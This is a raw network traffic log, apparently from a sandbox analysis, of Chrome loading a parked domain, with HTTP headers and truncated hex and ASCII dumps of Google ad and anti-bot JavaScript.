sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://syndicatedsearch.goog/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:23 UTC | 796 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
Content-Length: 200
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 29 Aug 2024 15:12:23 GMT
Expires: Fri, 30 Aug 2024 14:12:23 GMT
Cache-Control: public, max-age=82800
Last-Modified: Thu, 02 Nov 2023 22:48:00 GMT
Content-Type: image/svg+xml
Vary: Accept-Encoding
Age: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-08-29 15:12:23 UTC | 200 | IN | Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 53785 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:24 UTC | 549 | OUT | OPTIONS /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
Host: api.aws.parking.godaddy.com
Connection: keep-alive
Accept: */*
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Origin: https://www.onefordvd.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: empty
Referer: https://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:25 UTC | 643 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:25 GMT
Content-Type: text/plain
Content-Length: 0
Connection: close
Set-Cookie: AWSALB=Q7/rfyb08fr7bSkY4TryTaenm8DmeXFZBLp4q8IVaezKNWjfmCYR3aCuDUtOI+ngqwM8PSi5MfobZvxtZi629HcCCXd5hh+ABT0HypuSmgzxo3wm9hcrgePk1pY+; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/
Set-Cookie: AWSALBCORS=Q7/rfyb08fr7bSkY4TryTaenm8DmeXFZBLp4q8IVaezKNWjfmCYR3aCuDUtOI+ngqwM8PSi5MfobZvxtZi629HcCCXd5hh+ABT0HypuSmgzxo3wm9hcrgePk1pY+; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/; SameSite=None; Secure
access-control-allow-methods: POST
access-control-allow-headers: content-type
access-control-allow-origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 53787 | 142.250.184.238 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:24 UTC | 373 | OUT | GET /adsense/domains/caf.js?pac=0 HTTP/1.1
Host: syndicatedsearch.goog
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:25 UTC | 845 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/javascript; charset=UTF-8
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
Content-Length: 153712
Date: Thu, 29 Aug 2024 15:12:25 GMT
Expires: Thu, 29 Aug 2024 15:12:25 GMT
Cache-Control: private, max-age=3600
ETag: "14480395013971742414"
X-Content-Type-Options: nosniff
Link: <https://syndicatedsearch.goog>; rel="preconnect"
Server: sffe
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-08-29 15:12:25 UTC | 545 | IN | Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: eServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpb
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: .me};var d="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: ;return}typeof h=="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+t
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: pe.hb=function(g,h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: ength));for(var e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: =l.head;)return l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: pe.clear=function(){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})
2024-08-29 15:12:25 UTC | 1390 | IN | Data Ascii: ",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.553788216.58.206.684434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:24 UTC668OUTGET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC799INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                          Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                          Content-Length: 54789
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Expires: Fri, 29 Aug 2025 15:12:25 GMT
                                                                          Cache-Control: public, max-age=31536000
                                                                          Last-Modified: Wed, 21 Aug 2024 13:30:00 GMT
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                           2024-08-29 15:12:25 UTC | 591 | IN | Data Raw: 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 67 4d 79 77 69 63 32 39 31 63 6d 4e 6c 63 79 49 36 57 79 49 69 58 53 77 69 63 32 39 31 63 6d 4e 6c 63 30 4e 76 62 6e 52 6c 62 6e 51 69 4f 6c 73 69 49 43 4a 64 4c 43 4a 75 59 57 31 6c 63 79 49 36 57 79 4a 6a 62 47 39 7a 64 58 4a 6c 52 48 6c 75 59 57 31 70 59 30 4a 31 64 48 52 76 62 69 4a 64 4c 43 4a 74 59 58 42 77 61 57 35 6e 63 79 49 36 49 6b 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 37 51 55 46 42 51 54 74 42 51 55 46 42 4f 30 46 42 51 55 45 69 66 51 3d 3d 0a 28 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: //# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==(function(
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 73 2c 7a 3d 32 31 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 33 38 29 56 2e 63 6f 6e 73 6f 6c 65 5b 59 5d 28 4c 2e 6d 65 73 73 61 67 65 29 2c 7a 3d 52 3b 65 6c 73 65 20 69 66 28 7a 3d 3d 31 35 29 72 65 74 75 72 6e 20 51 7d 7d 63 61 74 63 68 28 57 29 7b 69 66 28 62 3d 3d 6e 29 74 68 72 6f 77 20 57 3b 62 3d 3d 36 35 26 26 28 4c 3d 57 2c 7a 3d 76 29 7d 7d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 52 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 74 68 69 73 2c 52 29 7d 2c 56 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 28 30 2c 65 76 61 6c 29 28 66 75 6e 63 74 69 6f 6e 28 52 2c 76 29 7b 72 65 74 75 72 6e 28 76 3d 47 28 39 35 2c 39 36 2c 34 31 2c 33 35 2c 22 65 72 72 6f 72 22 2c 22 62 67 22 2c 6e 75 6c 6c 29 29 26 26 52 2e 65 76 61 6c 28 76 2e 63 72 65 61 74 65 53 63 72 69 70 74
                                                                          Data Ascii: s,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 65 6c 73 65 20 69 66 28 4c 3d 3d 38 30 29 4c 3d 28 6e 7c 39 29 3e 3e 34 3c 32 26 26 28 28 6e 5e 36 38 29 26 31 34 29 3e 3d 38 3f 33 38 3a 39 35 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 37 30 29 64 65 6c 65 74 65 20 52 2e 73 5b 42 5d 2c 52 2e 7a 50 2d 2d 2c 4c 3d 39 35 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 39 36 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 35 26 26 28 4c 3d 28 6e 26 31 30 30 29 3d 3d 6e 3f 37 34 3a 36 35 29 7d 7d 2c 6e 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 29 7b 66 6f 72 28 51 3d 35 38 3b 51 21 3d 31 37 3b 29 69 66 28 51 3d 3d 35 34 29 74 68 69 73 2e 73 72 63 3d 62 2c 74 68 69 73 2e 73 3d 7b 7d 2c 74 68 69 73 2e 7a 50 3d 30 2c 51 3d 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 33 29 51 3d 6e 2b 37 26 31 31 3f 39 37 3a 33
                                                                          Data Ascii: else if(L==80)L=(n|9)>>4<2&&((n^68)&14)>=8?38:95;else if(L==70)delete R.s[B],R.zP--,L=95;else{if(L==96)return v;L==15&&(L=(n&100)==n?74:65)}},nD=function(z,n,b,R,B,Q,w){for(Q=58;Q!=17;)if(Q==54)this.src=b,this.s={},this.zP=0,Q=7;else if(Q==3)Q=n+7&11?97:3
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 75 6e 63 74 69 6f 6e 22 3f 42 3d 6e 3a 28 6e 5b 66 44 5d 7c 7c 28 6e 5b 66 44 5d 3d 66 75 6e 63 74 69 6f 6e 28 77 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 77 29 7d 29 2c 42 3d 6e 5b 66 44 5d 29 2c 51 3d 7a 29 7d 7d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 29 7b 66 6f 72 28 51 3d 36 37 3b 51 21 3d 33 38 3b 29 69 66 28 51 3d 3d 32 29 41 28 52 2c 6e 2c 62 29 2c 62 5b 56 4a 5d 3d 32 37 39 36 2c 51 3d 32 35 3b 65 6c 73 65 20 69 66 28 51 3d 3d 34 35 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 51 3d 35 37 3b 65 6c 73 65 20 69 66 28 51 3d 3d 31 30 29 51 3d 28 7a 26 31 32 32 29 3d 3d 7a 3f 37 35 3a 32 33 3b 65 6c 73 65 20 69 66 28 51 3d 3d 32 35 29 51 3d 28 7a 2b 33 26 32 39 29 3c 7a 26 26 28
                                                                          Data Ascii: unction"?B=n:(n[fD]||(n[fD]=function(w){return n.handleEvent(w)}),B=n[fD]),Q=z)}},D=function(z,n,b,R,B,Q){for(Q=67;Q!=38;)if(Q==2)A(R,n,b),b[VJ]=2796,Q=25;else if(Q==45)this[this+""]=this,Q=57;else if(Q==10)Q=(z&122)==z?75:23;else if(Q==25)Q=(z+3&29)<z&&(
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 2c 77 35 2d 2d 2c 51 3d 58 28 36 2c 42 29 2c 4c 3d 32 37 3b 65 6c 73 65 20 69 66 28 4c 3d 3d 33 30 29 74 68 69 73 5b 74 68 69 73 2b 22 22 5d 3d 74 68 69 73 2c 4c 3d 31 34 3b 65 6c 73 65 7b 69 66 28 4c 3d 3d 31 34 29 72 65 74 75 72 6e 20 76 3b 4c 3d 3d 31 30 3f 4c 3d 38 30 3a 4c 3d 3d 35 31 3f 28 69 51 28 39 36 2c 74 72 75 65 2c 31 33 2c 52 29 2c 4c 3d 34 31 29 3a 4c 3d 3d 39 39 3f 4c 3d 42 26 26 42 5b 67 35 5d 3f 34 34 3a 34 32 3a 4c 3d 3d 35 30 3f 4c 3d 7a 3e 3e 31 26 37 3f 33 33 3a 39 30 3a 4c 3d 3d 38 30 3f 4c 3d 28 7a 2b 32 5e 31 35 29 3e 3d 7a 26 26 28 7a 2b 34 5e 33 31 29 3c 7a 3f 36 33 3a 34 31 3a 4c 3d 3d 32 37 26 26 28 4c 3d 51 3f 36 34 3a 35 31 29 7d 7d 2c 6c 51 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 2c 57 2c 4c 2c
                                                                          Data Ascii: ,w5--,Q=X(6,B),L=27;else if(L==30)this[this+""]=this,L=14;else{if(L==14)return v;L==10?L=80:L==51?(iQ(96,true,13,R),L=41):L==99?L=B&&B[g5]?44:42:L==50?L=z>>1&7?33:90:L==80?L=(z+2^15)>=z&&(z+4^31)<z?63:41:L==27&&(L=Q?64:51)}},lQ=function(z,n,b,R,B,Q,w,W,L,
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 35 30 3f 36 37 3a 32 39 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 37 29 74 68 69 73 2e 53 2e 70 75 73 68 28 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 39 29 52 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 52 3c 35 30 26 26 28 74 68 69 73 2e 53 5b 52 5d 3d 62 29 2c 56 3d 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 37 38 29 56 3d 42 26 26 42 2e 6f 6e 63 65 3f 34 37 3a 32 36 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 37 29 56 3d 36 35 3b 65 6c 73 65 20 69 66 28 56 3d 3d 36 35 29 56 3d 28 28 6e 5e 39 34 29 26 37 29 3d 3d 33 3f 31 36 3a 34 38 3b 65 6c 73 65 20 69 66 28 56 3d 3d 32 36 29 56 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 4c 29 3f 37 36 3a 38 33 3b 65 6c 73 65 20 69 66 28 56 3d 3d 31
                                                                          Data Ascii: 50?67:29;else if(V==67)this.S.push(b),V=48;else if(V==29)R=Math.floor(Math.random()*this.n),R<50&&(this.S[R]=b),V=48;else if(V==78)V=B&&B.once?47:26;else if(V==27)V=65;else if(V==65)V=((n^94)&7)==3?16:48;else if(V==26)V=Array.isArray(L)?76:83;else if(V==1
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 29 7b 66 6f 72 28 42 3d 28 51 3d 6d 28 62 2c 32 38 29 2c 30 29 3b 52 3e 30 3b 52 2d 2d 29 42 3d 42 3c 3c 7a 7c 76 6f 28 33 30 36 2c 62 2c 74 72 75 65 29 3b 41 28 62 2c 51 2c 42 29 7d 72 65 74 75 72 6e 28 6e 26 32 38 29 3d 3d 6e 26 26 28 7a 2e 47 3f 77 3d 78 4e 28 7a 2c 7a 2e 4f 29 3a 28 62 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 38 29 2c 2d 31 32 38 2d 32 2a 7e 28 62 26 31 32 38 29 2b 2d 32 2b 28 7e 62 26 31 32 38 29 26 26 28 62 5e 3d 31 32 38 2c 52 3d 55 38 28 33 30 36 2c 7a 2c 74 72 75 65 2c 32 29 2c 62 3d 28 62 3c 3c 32 29 2b 28 52 7c 30 29 29 2c 77 3d 62 29 29 2c 77 7d 2c 58 32 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 6e 2c 62 2c 52 2c 42 2c 51 2c 77 2c 57 2c 4c 2c 76 2c 66 2c 56 29 7b 66 6f 72 28 56 3d 35 38 3b 56 21 3d 33 36 3b 29 69 66 28 56 3d 3d
                                                                          Data Ascii: ){for(B=(Q=m(b,28),0);R>0;R--)B=B<<z|vo(306,b,true);A(b,Q,B)}return(n&28)==n&&(z.G?w=xN(z,z.O):(b=U8(306,z,true,8),-128-2*~(b&128)+-2+(~b&128)&&(b^=128,R=U8(306,z,true,2),b=(b<<2)+(R|0)),w=b)),w},X2=function(z,n,b,R,B,Q,w,W,L,v,f,V){for(V=58;V!=36;)if(V==
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 70 74 75 72 65 3a 21 21 51 2c 57 3d 69 51 28 39 36 2c 57 2c 38 29 2c 67 3d 35 35 29 3a 67 3d 3d 30 3f 67 3d 56 3c 42 2e 6c 65 6e 67 74 68 3f 33 37 3a 34 32 3a 67 3d 3d 35 30 3f 67 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 42 29 3f 33 30 3a 35 38 3a 67 3d 3d 34 33 3f 67 3d 33 31 3a 67 3d 3d 34 35 3f 67 3d 35 32 3a 67 3d 3d 37 37 3f 28 77 2e 69 2e 72 65 6d 6f 76 65 28 53 74 72 69 6e 67 28 42 29 2c 57 2c 4c 2c 52 29 2c 67 3d 34 32 29 3a 67 3d 3d 36 37 3f 67 3d 28 7a 7c 35 36 29 3d 3d 7a 3f 36 36 3a 33 35 3a 67 3d 3d 37 31 3f 28 28 76 3d 66 2e 51 6f 28 42 2c 4c 2c 52 2c 57 29 29 26 26 4f 28 31 34 2c 22 6f 6e 22 2c 30 2c 76 29 2c 67 3d 34 32 29 3a 67 3d 3d 34 32 3f 67 3d 28 7a 7c 37 32 29 3d 3d 7a 3f 33 3a 34 3a 67 3d 3d 35 32 3f 67 3d 7a 2d 37 3c 3c 31 3c
                                                                          Data Ascii: pture:!!Q,W=iQ(96,W,8),g=55):g==0?g=V<B.length?37:42:g==50?g=Array.isArray(B)?30:58:g==43?g=31:g==45?g=52:g==77?(w.i.remove(String(B),W,L,R),g=42):g==67?g=(z|56)==z?66:35:g==71?((v=f.Qo(B,L,R,W))&&O(14,"on",0,v),g=42):g==42?g=(z|72)==z?3:4:g==52?g=z-7<<1<
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 6e 3f 38 35 3a 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 34 29 6c 3d 53 45 28 6e 2c 36 2c 32 35 2c 70 29 2c 59 3d 34 34 3b 65 6c 73 65 20 69 66 28 59 3d 3d 7a 29 4c 26 26 76 26 26 4c 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 2c 66 2c 61 72 29 2c 59 3d 32 35 3b 65 6c 73 65 20 69 66 28 59 3d 3d 32 30 29 7b 76 61 72 20 67 3d 21 6e 2e 67 2e 6c 65 6e 67 74 68 3b 59 3d 28 28 5a 28 35 37 2c 30 2c 6e 2c 70 29 2c 67 29 26 26 46 28 38 34 2c 32 35 34 2c 42 2c 6e 2c 42 29 2c 34 34 29 7d 65 6c 73 65 20 69 66 28 59 3d 3d 36 39 29 59 3d 57 3d 3d 32 3f 31 3a 38 33 3b 65 6c 73 65 20 69 66 28 59 3d 3d 36 29 76 61 72 20 70 3d 28 59 3d 36 39 2c 5b 6d 30 2c 77 2c 52 2c 76 6f 69 64 20 30 2c 4c 2c 76 2c 61 72 67 75 6d 65 6e 74 73 5d 29 3b 65 6c 73 65
                                                                          Data Ascii: n?85:25;else if(Y==24)l=SE(n,6,25,p),Y=44;else if(Y==z)L&&v&&L.removeEventListener(v,f,ar),Y=25;else if(Y==20){var g=!n.g.length;Y=((Z(57,0,n,p),g)&&F(84,254,B,n,B),44)}else if(Y==69)Y=W==2?1:83;else if(Y==6)var p=(Y=69,[m0,w,R,void 0,L,v,arguments]);else
                                                                           2024-08-29 15:12:25 UTC | 1390 | IN | Data Raw: 3f 51 2e 64 6c 28 29 3a 6e 65 77 20 51 3a 6e 75 6c 6c 2c 76 3d 35 37 29 3a 76 3d 3d 38 31 3f 28 42 3d 69 51 28 39 36 2c 42 2c 31 30 29 2c 52 26 26 52 5b 67 35 5d 3f 52 2e 69 2e 61 64 64 28 53 74 72 69 6e 67 28 57 29 2c 42 2c 62 2c 49 28 35 36 2c 6e 75 6c 6c 2c 77 29 3f 21 21 77 2e 63 61 70 74 75 72 65 3a 21 21 77 2c 51 29 3a 72 35 28 31 38 2c 6e 75 6c 6c 2c 66 61 6c 73 65 2c 57 2c 77 2c 42 2c 62 2c 52 2c 51 29 2c 76 3d 34 29 3a 76 3d 3d 33 39 3f 28 4c 2b 2b 2c 76 3d 39 30 29 3a 76 3d 3d 37 34 3f 28 62 28 66 75 6e 63 74 69 6f 6e 28 56 29 7b 56 28 6e 29 7d 29 2c 66 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 5d 2c 76 3d 34 35 29 3a 76 3d 3d 38 38 3f 76 3d 7a 2b 39 3e 3e 33 3d 3d 33 3f 37 34 3a 34
                                                                          Data Ascii: ?Q.dl():new Q:null,v=57):v==81?(B=iQ(96,B,10),R&&R[g5]?R.i.add(String(W),B,b,I(56,null,w)?!!w.capture:!!w,Q):r5(18,null,false,W,w,B,b,R,Q),v=4):v==39?(L++,v=90):v==74?(b(function(V){V(n)}),f=[function(){return n},function(){}],v=45):v==88?v=z+9>>3==3?74:4


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           28 | 192.168.2.5 | 53747 | 172.217.16.206 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:25 UTC | 880 | OUT | GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:25 UTC | 715 | IN | HTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Cipd9fE2r4horRBdJgcJUA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
